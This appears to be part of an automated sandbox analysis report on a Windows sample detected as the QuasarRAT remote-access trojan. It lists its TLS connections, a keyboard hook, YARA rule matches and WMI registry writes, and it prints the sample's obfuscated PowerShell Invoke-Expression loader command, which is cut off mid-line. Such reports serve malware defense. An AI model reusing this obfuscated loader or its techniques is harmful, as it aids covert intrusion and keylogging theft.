                      Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.10:49782 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.10:49788 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49793 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49797 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49824 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49850 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49876 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49902 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49928 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49957 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49983 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49988 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49989 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49991 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49992 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49993 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49994 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49995 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49996 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49997 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49998 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49999 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50000 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50001 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50002 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50003 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50004 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50005 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50006 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50007 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50008 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50009 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50010 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50011 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50012 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50013 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50014 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50015 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50016 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50017 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50018 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50019 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50020 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50021 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50022 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50023 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50024 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50025 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50026 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50027 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50028 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50029 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50030 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50031 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50032 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50033 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50034 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50035 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50036 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50037 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50038 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50039 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50040 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50041 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50042 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50043 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50044 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50045 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50046 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50047 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50048 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50049 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50050 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50051 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50052 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50053 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50054 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50055 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50056 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50057 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50058 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50059 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Installs a global keyboard hook
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior

                      E-Banking Fraud

                      barindex
                      Yara detected Quasar RAT
                      Source: Yara matchFile source: 8.2.powershell.exe.225576fb380.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.225576d3348.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.225576d3348.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.2255fa80000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.225576fb380.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.2255f9c0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.22557635510.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.2255f9c0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.22557635510.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2800661538.000002255FA80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2741051863.00000225576FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2591788897.0000022548849000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2797885450.000002255F9C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5964, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 8.2.powershell.exe.2255f9c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                      Source: 8.2.powershell.exe.2255f9c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Vermin Keylogger Author: Florian Roth
                      Source: 8.2.powershell.exe.2255f9c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects BackNet samples Author: Florian Roth
                      Source: 8.2.powershell.exe.22557635510.2.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                      Source: 8.2.powershell.exe.22557635510.2.unpack, type: UNPACKEDPEMatched rule: Detects Vermin Keylogger Author: Florian Roth
                      Source: 8.2.powershell.exe.22557635510.2.unpack, type: UNPACKEDPEMatched rule: Detects BackNet samples Author: Florian Roth
                      Source: 8.2.powershell.exe.2255f9c0000.7.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                      Source: 8.2.powershell.exe.2255f9c0000.7.unpack, type: UNPACKEDPEMatched rule: Detects Vermin Keylogger Author: Florian Roth
                      Source: 8.2.powershell.exe.2255f9c0000.7.unpack, type: UNPACKEDPEMatched rule: Detects BackNet samples Author: Florian Roth
                      Source: 8.2.powershell.exe.22557635510.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                      Source: 8.2.powershell.exe.22557635510.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Vermin Keylogger Author: Florian Roth
                      Source: 8.2.powershell.exe.22557635510.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects BackNet samples Author: Florian Roth
                      Source: 00000008.00000002.2797885450.000002255F9C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects QuasarRAT malware Author: Florian Roth
                      Source: 00000008.00000002.2797885450.000002255F9C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Vermin Keylogger Author: Florian Roth
                      Source: 00000008.00000002.2797885450.000002255F9C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects BackNet samples Author: Florian Roth
                      Source: Process Memory Space: powershell.exe PID: 7252, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 6104, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 5964, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Writes or reads registry keys via WMI
                      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::DeleteValue
                      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMI
                      Source: C:\Windows\System32\wscript.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\wscript.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\wscript.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\wscript.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\wscript.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\wscript.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Wscript starts Powershell (via cmd or directly)
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = 